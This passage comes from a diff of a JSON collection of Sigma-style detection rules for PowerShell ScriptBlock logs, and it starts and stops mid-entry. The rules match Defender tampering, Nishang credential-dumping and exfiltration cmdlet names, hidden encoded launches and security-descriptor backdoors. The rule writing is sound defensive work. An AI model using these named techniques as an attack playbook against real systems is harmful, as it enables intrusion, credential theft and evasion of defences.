Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ - "Legitimate user creation" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" ], - "filename": "posh_ps_create_local_user.yml" + "filename": "posh_ps_susp_unblock_file.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Start-Process PassThru", + "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "status": "test", + "description": "Powershell use PassThru option to start in background", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "posh_ps_susp_start_process.yml" }, { - "title": "Suspicious PowerShell Get Current User", - "id": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects the use of PowerShell to identify the current logged user.", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%[System.Environment]::UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%$env:UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Security.Principal.WindowsIdentity]::GetCurrent()%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_current_user.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Powershell XML Execute Command", - "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "title": "Potential Suspicious Windows Feature Enabled", + "id": "55c925c1-7195-426b-a136-a9396800e29b", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate usage of the features listed in the rule." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "posh_ps_xml_iex.yml" + "filename": "posh_ps_enable_susp_windows_optional_feature.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "Automated Collection Command PowerShell", - "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "title": "Suspicious TCP Tunnel Via PowerShell Script", + "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "status": "experimental", + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" ], - "filename": "posh_ps_automated_collection.yml" + "filename": "posh_ps_susp_proxy_scripts.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" - ], - "filename": "posh_ps_tamper_defender.yml" - }, - { - "title": "Execute Invoke-command on Remote Host", - "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "author": "frack113", - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ], - "falsepositives": [ - "Legitimate script" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_command_remote.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", - "id": "1139d2e2-84b1-4226-b445-354492eba8ba", - "status": "experimental", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", - "author": "James Pemberton / @4A616D6573", + "title": "Powershell Directory Enumeration", + "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", + "status": "test", + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" ], - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + "filename": "posh_ps_susp_directory_enum.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "title": "Powershell File and Directory Discovery", + "id": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\')" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "posh_ps_file_and_directory_discovery.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -7233,361 +6777,380 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE 